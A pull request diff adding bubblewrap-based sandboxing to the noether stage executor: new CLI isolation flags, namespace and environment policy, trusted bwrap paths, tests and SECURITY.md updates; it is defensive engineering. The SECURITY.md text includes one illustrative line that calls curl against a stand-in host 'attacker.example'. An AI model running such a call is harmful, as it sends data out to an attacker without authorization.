### PR TITLE
feat(M2.4): stage execution isolation — Phase 1 (bubblewrap)

### DIFF
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -45,12 +45,28 @@ running any stage you did not write.
 subprocess in a sandbox. Phase 1 uses **bubblewrap** when available:
 
 - Fresh user, PID, mount, UTS, IPC, and cgroup namespaces.
-- Read-only bind of `/nix/store`; read-write bind of a per-invocation
-  scratch directory as `/work`. Nothing outside `/work` is writable.
+- UID and GID mapped to `nobody` (65534), so the stage can't observe
+  the invoking user's real UID and can't regain privileges via
+  `setuid(0)` — also blocked by `--cap-drop ALL`.
+- Read-only bind of `/nix/store`; a sandbox-private tmpfs as `/work`.
+  Nothing outside `/work` is writable, and the work dir leaves no
+  host-side residue.
 - Fresh network namespace unless the stage declares `Effect::Network`.
+  When network is enabled, `/etc/resolv.conf`, `/etc/hosts`,
+  `/etc/nsswitch.conf`, and `/etc/ssl/certs` are bound read-only (via
+  `--ro-bind-try`, which no-ops on systems that route those
+  differently, e.g. NixOS) so DNS and TLS actually work.
 - All Linux capabilities dropped.
+- New session (`--new-session`) so the stage can't signal the
+  invoking shell's process group.
 - Environment cleared; only an allowlist (`PATH`, `HOME`, `NIX_PATH`,
-  `NIX_SSL_CERT_FILE`, locale vars) is passed through.
+  `NIX_SSL_CERT_FILE`, locale vars, `RUST_LOG`) is passed through —
+  and `HOME` / `USER` are overridden to sandbox-consistent values
+  (`/work` and `nobody`) so processes that rely on them see a
+  coherent identity.
+- `--require-isolation` (and `NOETHER_REQUIRE_ISOLATION=1`) turns
+  the auto-fallback-to-none warning into a hard error — use in CI
+  and production.
 
 Phase 2 (v0.8) replaces the bwrap wrapper with direct `unshare` +
 Landlock + seccomp syscalls — same policy, ~10× lower startup cost, no
@@ -58,6 +74,14 @@ external binary. Design: `docs/roadmap/2026-04-18-stage-isolation.md`.
 
 `--isolate=none` restores legacy behaviour. It emits a loud warning
 unless `--unsafe-no-isolation` is also passed.
+
+**Caveat — nix must be installed under `/nix/store`.** The sandbox
+binds `/nix/store` and the noether cache dir only. A distro-packaged
+nix at `/usr/bin/nix` is dynamically linked against host libraries
+that aren't bound; rather than widen the bind set (which would
+re-expose suid binaries), the executor refuses to run under
+isolation in that case with a message pointing the operator at the
+upstream or Determinate nix installer.
 
 ### What this means in practice
 

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -29,31 +29,52 @@ running any stage you did not write.
   Nix and the matching store paths.
 - Blocks network access during **Nix evaluation** (build time).
 
-### What it does NOT do
+### What it does NOT do by default
 
-- **It does not sandbox the subprocess.** When a stage runs, the child
-  process inherits the host user's:
-  - Filesystem access (read `~/.ssh/*`, read env files, write anywhere)
-  - Network (arbitrary outbound HTTP, DNS, raw sockets)
-  - Environment variables (all parent env is inherited)
-  - Process privileges
-- A stage can legally do `import os; os.system("curl attacker.example/...")`.
+- **It does not sandbox the subprocess** when `--isolate=none`. A stage
+  without isolation inherits the host user's filesystem access,
+  network, environment, and process privileges. A stage can legally do
+  `import os; os.system("curl attacker.example/...")`.
 - The `__direct__` venv fallback (used when a stage declares
-  `# requires:` pip packages) bypasses Nix entirely and runs in the host's
-  Python.
+  `# requires:` pip packages) bypasses Nix entirely and runs in the
+  host's Python.
+
+### What isolation adds (v0.7+)
+
+`noether run --isolate=auto` (the default from v0.7) wraps each stage
+subprocess in a sandbox. Phase 1 uses **bubblewrap** when available:
+
+- Fresh user, PID, mount, UTS, IPC, and cgroup namespaces.
+- Read-only bind of `/nix/store`; read-write bind of a per-invocation
+  scratch directory as `/work`. Nothing outside `/work` is writable.
+- Fresh network namespace unless the stage declares `Effect::Network`.
+- All Linux capabilities dropped.
+- Environment cleared; only an allowlist (`PATH`, `HOME`, `NIX_PATH`,
+  `NIX_SSL_CERT_FILE`, locale vars) is passed through.
+
+Phase 2 (v0.8) replaces the bwrap wrapper with direct `unshare` +
+Landlock + seccomp syscalls — same policy, ~10× lower startup cost, no
+external binary. Design: `docs/roadmap/2026-04-18-stage-isolation.md`.
+
+`--isolate=none` restores legacy behaviour. It emits a loud warning
+unless `--unsafe-no-isolation` is also passed.
 
 ### What this means in practice
 
-**Safe:** running stages you wrote, stages from `stdlib`, stages you read
-end-to-end before running.
+**Safe** (with the default `--isolate=auto` + bubblewrap installed):
+running stdlib stages, running LLM-synthesized stages you haven't
+audited yet, running any stage whose declared effects match what it
+actually does. The sandbox blocks filesystem escape, arbitrary
+network calls, and credential theft.
 
-**Not safe:** running a stage pulled from a registry you don't fully trust,
-running a stage synthesized by an LLM without review, running any stage on
-a host with credentials you aren't willing to risk.
+**Still risky, even with isolation**: stages declared `Effect::Network`
+can still call arbitrary URLs — the sandbox only decides whether
+network is reachable at all, not where to. Audit network-effect stages
+or run them with per-stage URL allowlisting (not yet in v0.7 — tracked
+as follow-up).
 
-**If you need isolation**, wrap the child process yourself — `bwrap`,
-`firejail`, `nsjail` with seccomp, a throwaway container, or a VM. Noether
-does not ship this. Contributions welcome.
+**Without isolation** (`--isolate=none`): same posture as pre-v0.7 —
+suitable only for stages you wrote and audited yourself.
 
 ## Composition Verification
 

--- a/crates/noether-cli/src/commands/compose.rs
+++ b/crates/noether-cli/src/commands/compose.rs
@@ -231,7 +231,12 @@ fn emit_result(store: &mut dyn StageStore, ctx: EmitCtx<'_>) {
 
     let mut executor = super::executor_builder::build_executor_with_embeddings(store);
     for syn in ctx.synthesized {
-        executor.register_synthesized(&syn.stage_id, &syn.implementation, &syn.language);
+        executor.register_synthesized(
+            &syn.stage_id,
+            &syn.implementation,
+            &syn.language,
+            syn.effects.clone(),
+        );
     }
 
     if !ctx.synthesized.is_empty() && !executor.nix_available() {

--- a/crates/noether-cli/src/commands/executor_builder.rs
+++ b/crates/noether-cli/src/commands/executor_builder.rs
@@ -5,6 +5,7 @@
 //! `build_embedding_provider()` for provider selection logic.
 
 use noether_engine::executor::composite::CompositeExecutor;
+use noether_engine::executor::isolation::IsolationBackend;
 use noether_engine::providers;
 use noether_store::StageStore;
 
@@ -15,6 +16,18 @@ use noether_store::StageStore;
 /// `build_executor_with_embeddings` for commands that need semantic search
 /// (e.g., `noether compose`).
 pub fn build_executor(store: &dyn StageStore) -> CompositeExecutor {
+    build_executor_with_isolation(store, IsolationBackend::None)
+}
+
+/// Build a `CompositeExecutor` with a specific isolation backend for
+/// the embedded NixExecutor. `noether run` uses this to respect the
+/// `--isolate` flag; other entry points that don't accept the flag
+/// call [`build_executor`] which is equivalent to
+/// `build_executor_with_isolation(store, IsolationBackend::None)`.
+pub fn build_executor_with_isolation(
+    store: &dyn StageStore,
+    isolation: IsolationBackend,
+) -> CompositeExecutor {
     let (llm_provider, llm_name) = providers::build_llm_provider();
 
     if llm_name != "mock" {
@@ -23,6 +36,7 @@ pub fn build_executor(store: &dyn StageStore) -> CompositeExecutor {
 
     CompositeExecutor::from_store(store)
         .with_llm(llm_provider, noether_engine::llm::LlmConfig::default())
+        .with_isolation(isolation)
 }
 
 /// Build a `CompositeExecutor` with LLM + embedding providers.

--- a/crates/noether-cli/src/commands/run.rs
+++ b/crates/noether-cli/src/commands/run.rs
@@ -20,6 +20,8 @@ pub struct RunPolicies<'a> {
     pub effects: &'a EffectPolicy,
     /// Maximum total cost in cents. `None` = no limit.
     pub budget_cents: Option<u64>,
+    /// Isolation backend applied to every Nix-executed stage.
+    pub isolation: noether_engine::executor::isolation::IsolationBackend,
 }
 
 pub fn cmd_run(
@@ -244,7 +246,8 @@ pub fn cmd_run(
 
     // 9. Execute — wrap with BudgetedExecutor when a budget is set so cost
     //    is tracked and enforced at runtime (not just statically pre-flight).
-    let executor = super::executor_builder::build_executor(store);
+    let executor =
+        super::executor_builder::build_executor_with_isolation(store, policies.isolation.clone());
     let result = if let Some(budget) = policies.budget_cents {
         let cost_map = build_cost_map(&graph.root, store);
         let budgeted = BudgetedExecutor::new(executor, cost_map, budget);

--- a/crates/noether-cli/src/main.rs
+++ b/crates/noether-cli/src/main.rs
@@ -64,6 +64,17 @@ enum Commands {
         /// Reject compositions whose estimated cost exceeds this value (in cents).
         #[arg(long)]
         budget_cents: Option<u64>,
+        /// Sandbox every stage subprocess. `auto` (default, v0.7+)
+        /// picks bubblewrap when available, falls back to `none` with
+        /// a warning. `bwrap` requires bubblewrap; fails hard if
+        /// missing. `none` disables isolation entirely — warns unless
+        /// `--unsafe-no-isolation` is also passed.
+        #[arg(long, env = "NOETHER_ISOLATION", default_value = "auto")]
+        isolate: String,
+        /// Silence the "isolation disabled" warning when `--isolate=none`.
+        /// Required in CI/scripts that deliberately opt out.
+        #[arg(long)]
+        unsafe_no_isolation: bool,
     },
     /// Retrieve execution trace for a past composition
     Trace {
@@ -603,6 +614,8 @@ fn main() {
             allow_capabilities,
             allow_effects,
             budget_cents,
+            isolate,
+            unsafe_no_isolation,
         } => {
             let store = build_store(registry);
             let mut trace_store = init_trace_store();
@@ -616,6 +629,36 @@ fn main() {
             };
             let policy = parse_capability_policy(allow_capabilities.as_deref());
             let effect_policy = parse_effect_policy(allow_effects.as_deref());
+
+            // Parse --isolate / NOETHER_ISOLATION. Warn loudly on
+            // --isolate=none unless --unsafe-no-isolation is also set.
+            use noether_engine::executor::isolation::IsolationBackend;
+            let (isolation_backend, isolation_warning) = match IsolationBackend::from_flag(&isolate)
+            {
+                Ok((b, w)) => (b, w),
+                Err(e) => {
+                    eprintln!(
+                        "{}",
+                        crate::output::acli_error(&format!("invalid --isolate value: {e}"))
+                    );
+                    std::process::exit(2);
+                }
+            };
+            if let Some(w) = &isolation_warning {
+                eprintln!("Warning: {w}");
+            }
+            if matches!(isolation_backend, IsolationBackend::None)
+                && isolation_warning.is_none()
+                && !unsafe_no_isolation
+            {
+                eprintln!(
+                    "Warning: --isolate=none runs stages with host-user \
+                     privileges. A malicious stage can read ~/.ssh, make \
+                     network calls, and write anywhere you can. Pass \
+                     --unsafe-no-isolation to silence this warning."
+                );
+            }
+
             commands::run::cmd_run(
                 store.as_ref(),
                 &mut trace_store,
@@ -626,6 +669,7 @@ fn main() {
                     capabilities: &policy,
                     effects: &effect_policy,
                     budget_cents,
+                    isolation: isolation_backend,
                 },
             );
         }

--- a/crates/noether-cli/src/main.rs
+++ b/crates/noether-cli/src/main.rs
@@ -75,6 +75,15 @@ enum Commands {
         /// Required in CI/scripts that deliberately opt out.
         #[arg(long)]
         unsafe_no_isolation: bool,
+        /// Fail-closed when isolation is unavailable. With this flag
+        /// set (or `NOETHER_REQUIRE_ISOLATION=1` in env), the
+        /// `--isolate=auto` fallback to `none` becomes a hard error
+        /// instead of a warning — stage execution refuses to start
+        /// unless a real sandbox backend is in place. Intended for
+        /// CI and production environments where running a stage
+        /// unsandboxed is never the right answer.
+        #[arg(long, env = "NOETHER_REQUIRE_ISOLATION")]
+        require_isolation: bool,
     },
     /// Retrieve execution trace for a past composition
     Trace {
@@ -616,6 +625,7 @@ fn main() {
             budget_cents,
             isolate,
             unsafe_no_isolation,
+            require_isolation,
         } => {
             let store = build_store(registry);
             let mut trace_store = init_trace_store();
@@ -644,6 +654,24 @@ fn main() {
                     std::process::exit(2);
                 }
             };
+            // Fail-closed: when `--require-isolation` /
+            // NOETHER_REQUIRE_ISOLATION is set, an unsandboxed
+            // backend (either explicit `--isolate=none` or the
+            // `auto` → `none` fallback on a host without bwrap) is
+            // a hard error. Intended for CI and production: "run
+            // the stage unsandboxed" is never the right answer
+            // there, so upgrade the usual warning to an exit.
+            if require_isolation && matches!(isolation_backend, IsolationBackend::None) {
+                let why = isolation_warning.as_deref().unwrap_or(
+                    "--isolate=none explicitly selected while \
+                     --require-isolation is in effect",
+                );
+                eprintln!(
+                    "{}",
+                    crate::output::acli_error(&format!("refusing to run without isolation: {why}"))
+                );
+                std::process::exit(2);
+            }
             if let Some(w) = &isolation_warning {
                 eprintln!("Warning: {w}");
             }
@@ -655,7 +683,8 @@ fn main() {
                     "Warning: --isolate=none runs stages with host-user \
                      privileges. A malicious stage can read ~/.ssh, make \
                      network calls, and write anywhere you can. Pass \
-                     --unsafe-no-isolation to silence this warning."
+                     --unsafe-no-isolation to silence this warning, or \
+                     --require-isolation to turn it into a hard error."
                 );
             }
 

--- a/crates/noether-engine/Cargo.toml
+++ b/crates/noether-engine/Cargo.toml
@@ -30,6 +30,7 @@ regex = { workspace = true }
 chrono = { workspace = true }
 ed25519-dalek = { workspace = true }
 rand = { workspace = true }
+tracing = "0.1"
 rusqlite = { version = "0.39.0", features = ["bundled"], optional = true }
 arrow = { version = "58", optional = true, default-features = false, features = ["ipc"] }
 base64 = { version = "0.22", optional = true }

--- a/crates/noether-engine/src/agent/mod.rs
+++ b/crates/noether-engine/src/agent/mod.rs
@@ -44,6 +44,11 @@ pub struct SynthesisResult {
     pub implementation: String,
     /// Language of the generated code (e.g. "python").
     pub language: String,
+    /// Effects inferred for the synthesized stage. The executor uses
+    /// this to derive the correct isolation policy — dropping it here
+    /// meant synthesized Network stages ended up with a no-network
+    /// sandbox and failed opaquely at runtime.
+    pub effects: noether_core::effects::EffectSet,
     /// Number of LLM attempts needed to produce a valid implementation.
     pub attempts: u32,
     /// False when a stage with an identical signature was already in the store.
@@ -424,7 +429,7 @@ impl<'a> CompositionAgent<'a> {
                 .output(spec.output.clone())
                 .description(&spec.description)
                 .implementation_code(&syn_resp.implementation, &syn_resp.language)
-                .effects(inferred_effects);
+                .effects(inferred_effects.clone());
 
             for ex in &syn_resp.examples {
                 builder = builder.example(ex.input.clone(), ex.output.clone());
@@ -464,6 +469,7 @@ impl<'a> CompositionAgent<'a> {
                         stage_id: existing_id,
                         implementation: syn_resp.implementation,
                         language: syn_resp.language,
+                        effects: inferred_effects,
                         attempts: attempt,
                         is_new: false,
                     });
@@ -510,6 +516,7 @@ impl<'a> CompositionAgent<'a> {
                 stage_id,
                 implementation: syn_resp.implementation,
                 language: syn_resp.language,
+                effects: inferred_effects,
                 attempts: attempt,
                 is_new,
             });

--- a/crates/noether-engine/src/executor/composite.rs
+++ b/crates/noether-engine/src/executor/composite.rs
@@ -48,6 +48,28 @@ impl CompositeExecutor {
         }
     }
 
+    /// Replace the isolation backend on the embedded NixExecutor.
+    /// No-op when Nix isn't installed (synthesized stages can't run
+    /// anyway, so the sandbox question doesn't arise).
+    pub fn with_isolation(mut self, backend: super::isolation::IsolationBackend) -> Self {
+        if let Some(nix) = self.nix.take() {
+            use super::nix::{NixConfig, NixExecutor};
+            // Rebuild NixExecutor with the new isolation setting.
+            // NixExecutor doesn't expose a public with_isolation setter
+            // today because the config field was just added; use the
+            // builder pattern via `NixConfig::with_isolation` at
+            // construction time. Reconstruct by re-reading the existing
+            // config and swapping the backend.
+            let old_config = nix.config_snapshot();
+            let new_config = NixConfig {
+                isolation: backend,
+                ..old_config
+            };
+            self.nix = NixExecutor::rebuild_with_config(nix, new_config);
+        }
+        self
+    }
+
     /// Attach an LLM provider so `llm_complete` / `llm_classify` / `llm_extract`
     /// stages are actually executed instead of returning a config error.
     pub fn with_llm(

--- a/crates/noether-engine/src/executor/composite.rs
+++ b/crates/noether-engine/src/executor/composite.rs
@@ -91,11 +91,22 @@ impl CompositeExecutor {
         self
     }
 
-    /// Register a freshly synthesized stage so it can be executed immediately
-    /// without reloading the store.
-    pub fn register_synthesized(&mut self, stage_id: &StageId, code: &str, language: &str) {
+    /// Register a freshly synthesized stage so it can be executed
+    /// immediately without reloading the store. The caller **must**
+    /// supply the stage's declared effects — the isolation policy is
+    /// derived from them, and silently defaulting to
+    /// [`EffectSet::pure`](noether_core::effects::EffectSet::pure)
+    /// would put a Network-effect stage into a no-network sandbox and
+    /// surface as an opaque DNS failure at runtime.
+    pub fn register_synthesized(
+        &mut self,
+        stage_id: &StageId,
+        code: &str,
+        language: &str,
+        effects: noether_core::effects::EffectSet,
+    ) {
         if let Some(nix) = &mut self.nix {
-            nix.register(stage_id, code, language);
+            nix.register_with_effects(stage_id, code, language, effects);
         }
     }
 

--- a/crates/noether-engine/src/executor/isolation.rs
+++ b/crates/noether-engine/src/executor/isolation.rs
@@ -267,6 +267,28 @@ pub fn build_bwrap_command(
     }
     c.arg("--chdir").arg("/work");
 
+    // Env: `--clearenv` wipes the inner process's inherited env,
+    // then `--setenv` repopulates it. Setting `cmd.env(...)` on the
+    // outer `Command` would only affect `bwrap` itself, not the
+    // inner command — that was the trap the previous design fell
+    // into (HOME was set on bwrap but stripped before the stage
+    // ran, so `nix` crashed looking for a home directory).
+    //
+    // HOME / USER are always set to sandbox-consistent values
+    // (/work + "nobody" matching the UID mapping). Other allowlist
+    // entries inherit their value from the invoking process if set
+    // there.
+    c.arg("--setenv").arg("HOME").arg("/work");
+    c.arg("--setenv").arg("USER").arg("nobody");
+    for var in &policy.env_allowlist {
+        if var == "HOME" || var == "USER" {
+            continue;
+        }
+        if let Ok(v) = std::env::var(var) {
+            c.arg("--setenv").arg(var).arg(v);
+        }
+    }
+
     c.arg("--").args(inner_cmd);
     c
 }

--- a/crates/noether-engine/src/executor/isolation.rs
+++ b/crates/noether-engine/src/executor/isolation.rs
@@ -29,6 +29,7 @@
 use noether_core::effects::{Effect, EffectSet};
 use std::path::{Path, PathBuf};
 use std::process::Command;
+use std::sync::atomic::{AtomicBool, Ordering};
 
 /// Which isolation backend to use for a stage execution.
 #[derive(Debug, Clone, PartialEq, Eq)]
@@ -253,17 +254,66 @@ pub fn build_bwrap_command(
     c
 }
 
-/// Locate the `bwrap` binary. Returns `None` if it's not on `PATH`.
+/// Locate the `bwrap` binary.
+///
+/// Checks a fixed list of trusted system paths first, because they're
+/// owned by root on every mainstream Linux distro and therefore can't
+/// be planted by a non-privileged attacker. Only if none of those
+/// exist does the search fall back to walking `$PATH` — at which
+/// point a `tracing::warn!` fires (once per process) so operators can
+/// notice that isolation is trusting an attacker-plantable lookup.
+///
+/// Returns `None` if `bwrap` is not installed anywhere we know to look.
 pub fn find_bwrap() -> Option<PathBuf> {
+    for trusted in TRUSTED_BWRAP_PATHS {
+        let candidate = PathBuf::from(trusted);
+        if candidate.is_file() {
+            return Some(candidate);
+        }
+    }
+
+    // Fallback: $PATH walk. Operators with a properly-provisioned
+    // host should never hit this branch; if they do, either `bwrap`
+    // was installed somewhere non-standard or the host's `$PATH` is
+    // pointing at attacker-writable directories (user shell rc files,
+    // container bind-mount mishaps, etc.).
     let path_env = std::env::var_os("PATH")?;
     for dir in std::env::split_paths(&path_env) {
         let candidate = dir.join("bwrap");
         if candidate.is_file() {
+            if !PATH_FALLBACK_WARNED.swap(true, Ordering::Relaxed) {
+                tracing::warn!(
+                    resolved = %candidate.display(),
+                    "bwrap resolved via $PATH — none of the trusted \
+                     system paths contained it. If this host's PATH \
+                     includes a user-writable directory, isolation can \
+                     be trivially bypassed. Install bwrap to /usr/bin \
+                     (distro package) or your system Nix profile."
+                );
+            }
             return Some(candidate);
         }
     }
     None
 }
+
+static PATH_FALLBACK_WARNED: AtomicBool = AtomicBool::new(false);
+
+/// Root-owned locations where `bwrap` lives on a correctly-provisioned
+/// Linux host. Order matters: NixOS system profile first (nix hosts
+/// almost always have this), then the Determinate / single-user nix
+/// profile, then distro-packaged `/usr/bin`, then manual installs.
+///
+/// A non-root attacker can't write to any of these on a standard
+/// system, so resolving through them short-circuits the `$PATH`
+/// planting vector.
+pub(crate) const TRUSTED_BWRAP_PATHS: &[&str] = &[
+    "/run/current-system/sw/bin/bwrap",
+    "/nix/var/nix/profiles/default/bin/bwrap",
+    "/usr/bin/bwrap",
+    "/usr/local/bin/bwrap",
+    "/opt/homebrew/bin/bwrap",
+];
 
 #[cfg(test)]
 mod tests {
@@ -395,6 +445,27 @@ mod tests {
             .position(|a| a == "--gid")
             .expect("--gid missing");
         assert_eq!(argv[gid_pos + 1], "65534");
+    }
+
+    #[test]
+    fn trusted_bwrap_paths_are_all_root_owned_locations() {
+        // This is a compile-time contract check: every entry in
+        // TRUSTED_BWRAP_PATHS must point at a directory that is
+        // conventionally root-owned on mainstream Linux hosts. If
+        // someone adds a user-writable path here (e.g. `~/.local/bin`)
+        // they re-introduce the vector `find_bwrap` was written to
+        // close. Keep it literal and reviewable — no interpolation.
+        for p in TRUSTED_BWRAP_PATHS {
+            assert!(
+                p.starts_with("/run/")
+                    || p.starts_with("/nix/var/")
+                    || p.starts_with("/usr/")
+                    || p.starts_with("/opt/"),
+                "TRUSTED_BWRAP_PATHS entry '{p}' looks user-writable; \
+                 anything outside /run /nix/var /usr /opt is not a \
+                 standard root-owned location"
+            );
+        }
     }
 
     #[test]

--- a/crates/noether-engine/src/executor/isolation.rs
+++ b/crates/noether-engine/src/executor/isolation.rs
@@ -30,6 +30,17 @@
 //! `--cap-drop ALL`, UID/GID mapped to nobody, `--clearenv` with a
 //! short allowlist.
 //!
+//! ### TLS trust store — dual path
+//!
+//! When `network=true`, the sandbox binds `/etc/ssl/certs`
+//! (via `--ro-bind-try`) for non-Nix-aware clients that expect the
+//! system trust store (curl, openssl). Nix-built code uses
+//! `NIX_SSL_CERT_FILE` / `SSL_CERT_FILE` (both in the env
+//! allowlist) pointing into `/nix/store`, which is always bound.
+//! So TLS works whether the stage resolves certs through the
+//! filesystem path or the env-pointer path; NixOS hosts without
+//! `/etc/ssl/certs` fall through to the env path automatically.
+//!
 //! ### Filesystem effects — not yet expressible
 //!
 //! The v0.6 `Effect` enum has no `FsRead(path)` / `FsWrite(path)`

--- a/crates/noether-engine/src/executor/isolation.rs
+++ b/crates/noether-engine/src/executor/isolation.rs
@@ -1,0 +1,316 @@
+//! Stage execution isolation.
+//!
+//! Wraps subprocess execution in a sandbox that restricts what the
+//! stage can read, write, and call. Closes the gap documented in
+//! `SECURITY.md`: a user-authored Python stage has host-user
+//! privileges by default; with isolation it runs in a bounded
+//! filesystem + network namespace.
+//!
+//! Phase 1 (v0.7) backends:
+//!
+//! - [`IsolationBackend::None`] — legacy pass-through. Emits a
+//!   warning unless the user opts in with
+//!   `--unsafe-no-isolation` / `NOETHER_ISOLATION=none`.
+//! - [`IsolationBackend::Bwrap`] — bubblewrap wrapper. Linux-only.
+//!   Requires the `bwrap` binary in `PATH`.
+//!
+//! Phase 2 (v0.8) will add `IsolationBackend::Native` — direct
+//! `unshare(2)` + Landlock + seccomp syscalls, no external binary.
+//! See `docs/roadmap/2026-04-18-stage-isolation.md`.
+//!
+//! ## Policy derivation
+//!
+//! An [`IsolationPolicy`] is derived from a stage's declared
+//! `EffectSet`: stages without `Effect::Network` get a fresh empty
+//! network namespace; all stages get read-only `/nix/store` and a
+//! per-invocation `/work` tmpdir. Host capabilities are dropped;
+//! the host's HOME, SSH keys, and credentials files are unreachable.
+
+use noether_core::effects::{Effect, EffectSet};
+use std::path::{Path, PathBuf};
+use std::process::Command;
+
+/// Which isolation backend to use for a stage execution.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum IsolationBackend {
+    /// No isolation — legacy behaviour. A malicious stage can read
+    /// host files, call out to the network, write to the user's
+    /// home directory. Noether emits a warning the first time this
+    /// backend is used unless `--unsafe-no-isolation` is set.
+    None,
+    /// Wrap the stage subprocess in `bwrap`. Requires the
+    /// bubblewrap binary in `PATH`. Linux-only.
+    Bwrap { bwrap_path: PathBuf },
+}
+
+impl IsolationBackend {
+    /// Resolve `"auto"`: pick the best backend available on this
+    /// host. On Linux with `bwrap` on `PATH`, that's
+    /// [`IsolationBackend::Bwrap`]. Elsewhere, falls back to
+    /// [`IsolationBackend::None`] with the returned warning string
+    /// so the caller can surface it.
+    pub fn auto() -> (Self, Option<String>) {
+        if let Some(path) = find_bwrap() {
+            return (IsolationBackend::Bwrap { bwrap_path: path }, None);
+        }
+        (
+            IsolationBackend::None,
+            Some(
+                "isolation backend 'auto' could not find bubblewrap \
+                 (bwrap) on PATH; stage execution runs with full host-user \
+                 privileges. Install bubblewrap (apt/brew/nix) to enable \
+                 sandboxing, or pass --unsafe-no-isolation to silence \
+                 this warning."
+                    .into(),
+            ),
+        )
+    }
+
+    /// Parse the `--isolate` / `NOETHER_ISOLATION` argument.
+    pub fn from_flag(flag: &str) -> Result<(Self, Option<String>), IsolationError> {
+        match flag {
+            "auto" => Ok(Self::auto()),
+            "bwrap" => match find_bwrap() {
+                Some(path) => Ok((IsolationBackend::Bwrap { bwrap_path: path }, None)),
+                None => Err(IsolationError::BackendUnavailable {
+                    backend: "bwrap".into(),
+                    reason: "binary not found in PATH".into(),
+                }),
+            },
+            "none" => Ok((IsolationBackend::None, None)),
+            other => Err(IsolationError::UnknownBackend { name: other.into() }),
+        }
+    }
+
+    pub fn is_effective(&self) -> bool {
+        !matches!(self, IsolationBackend::None)
+    }
+}
+
+/// Error from the isolation layer itself — policy misconfiguration,
+/// backend unavailable, bwrap spawn failure. Stage-body errors come
+/// back as the usual `ExecutionError` on the inner command.
+#[derive(Debug, Clone, PartialEq, thiserror::Error)]
+pub enum IsolationError {
+    #[error("isolation backend '{name}' is not recognised; expected one of: auto, bwrap, none")]
+    UnknownBackend { name: String },
+
+    #[error("isolation backend '{backend}' is unavailable: {reason}")]
+    BackendUnavailable { backend: String, reason: String },
+
+    #[error("failed to create work directory: {path} ({reason})")]
+    WorkDirCreate { path: String, reason: String },
+}
+
+/// What the sandbox does and doesn't let a stage reach.
+///
+/// Derived from a stage's `EffectSet` via
+/// [`IsolationPolicy::from_effects`]. Callers rarely construct this
+/// manually; it's shaped so the stage executor can translate it into
+/// backend-specific flags (bwrap args in Phase 1, unshare+landlock+seccomp
+/// in Phase 2).
+#[derive(Debug, Clone)]
+pub struct IsolationPolicy {
+    /// Read-only bind mounts: `(host_path, sandbox_path)`. Always
+    /// includes `/nix/store` so Nix-pinned runtimes resolve inside
+    /// the sandbox.
+    pub ro_binds: Vec<(PathBuf, PathBuf)>,
+    /// The stage's scratch directory. Bind-mounted read-write at the
+    /// sandbox path. Cleaned up after the stage exits.
+    pub work_bind: (PathBuf, PathBuf),
+    /// Inherit the host's network namespace (`true`) or unshare into
+    /// a fresh empty one (`false`). Only `true` when the stage has
+    /// `Effect::Network`.
+    pub network: bool,
+    /// Environment variables to pass through to the sandboxed
+    /// process. Everything else in the parent environment is
+    /// cleared.
+    pub env_allowlist: Vec<String>,
+}
+
+impl IsolationPolicy {
+    /// Build the policy for a stage with the given effects.
+    ///
+    /// `work_host` is the host-side tmpdir to bind-mount as `/work`
+    /// inside the sandbox. Callers pick this (typically a per-run
+    /// tmp). The policy takes ownership of the paths but not the
+    /// tmpdir lifetime — the caller is responsible for cleanup.
+    pub fn from_effects(effects: &EffectSet, work_host: PathBuf) -> Self {
+        let has_network = effects.iter().any(|e| matches!(e, Effect::Network));
+        Self {
+            ro_binds: vec![(PathBuf::from("/nix/store"), PathBuf::from("/nix/store"))],
+            work_bind: (work_host, PathBuf::from("/work")),
+            network: has_network,
+            env_allowlist: vec![
+                "PATH".into(),
+                "HOME".into(),
+                "USER".into(),
+                "LANG".into(),
+                "NIX_PATH".into(),
+                "NIX_SSL_CERT_FILE".into(),
+                "SSL_CERT_FILE".into(),
+                "NOETHER_LOG_LEVEL".into(),
+            ],
+        }
+    }
+}
+
+/// Build a `bwrap` invocation that runs `cmd` inside a sandbox.
+///
+/// Returns a `Command` ready to spawn — the caller keeps ownership
+/// of stdin/stdout/stderr piping and waits on the child. The
+/// `work_host` path must exist; `bwrap` will fail otherwise.
+///
+/// Flags used (see bubblewrap(1)):
+///
+/// - `--unshare-all` — fresh user, pid, uts, ipc, mount, cgroup
+///   namespaces. Network namespace is unshared too, unless the
+///   policy re-shares via `--share-net` (see below).
+/// - `--die-with-parent` — if the parent dies, so does the sandbox.
+/// - `--proc /proc`, `--dev /dev` — standard Linux mounts.
+/// - `--ro-bind <host> <sandbox>` — read-only mounts from the
+///   policy's `ro_binds`. Always includes `/nix/store`.
+/// - `--bind <work_host> /work` — writable scratch.
+/// - `--chdir /work` — subprocess starts in the scratch dir.
+/// - `--clearenv` — wipe the environment; the executor re-adds the
+///   allowlisted variables via `.env(...)`.
+/// - `--share-net` — only when `policy.network` is true.
+/// - `--cap-drop ALL` — drop every capability inside the sandbox.
+pub fn build_bwrap_command(
+    bwrap: &Path,
+    policy: &IsolationPolicy,
+    inner_cmd: &[String],
+) -> Command {
+    let mut c = Command::new(bwrap);
+    c.arg("--unshare-all")
+        .arg("--die-with-parent")
+        .arg("--new-session")
+        .arg("--proc")
+        .arg("/proc")
+        .arg("--dev")
+        .arg("/dev")
+        .arg("--tmpfs")
+        .arg("/tmp")
+        .arg("--clearenv")
+        .arg("--cap-drop")
+        .arg("ALL");
+
+    if policy.network {
+        c.arg("--share-net");
+    }
+
+    for (host, sandbox) in &policy.ro_binds {
+        c.arg("--ro-bind").arg(host).arg(sandbox);
+    }
+
+    c.arg("--bind")
+        .arg(&policy.work_bind.0)
+        .arg(&policy.work_bind.1)
+        .arg("--chdir")
+        .arg(&policy.work_bind.1);
+
+    c.arg("--").args(inner_cmd);
+    c
+}
+
+/// Locate the `bwrap` binary. Returns `None` if it's not on `PATH`.
+pub fn find_bwrap() -> Option<PathBuf> {
+    let path_env = std::env::var_os("PATH")?;
+    for dir in std::env::split_paths(&path_env) {
+        let candidate = dir.join("bwrap");
+        if candidate.is_file() {
+            return Some(candidate);
+        }
+    }
+    None
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use noether_core::effects::{Effect, EffectSet};
+
+    #[test]
+    fn from_flag_parses_known_values() {
+        assert!(matches!(
+            IsolationBackend::from_flag("none").unwrap().0,
+            IsolationBackend::None
+        ));
+        assert!(IsolationBackend::from_flag("unknown").is_err());
+    }
+
+    #[test]
+    fn policy_without_network_effect_isolates_network() {
+        let effects = EffectSet::pure();
+        let policy = IsolationPolicy::from_effects(&effects, PathBuf::from("/tmp/work"));
+        assert!(!policy.network);
+    }
+
+    #[test]
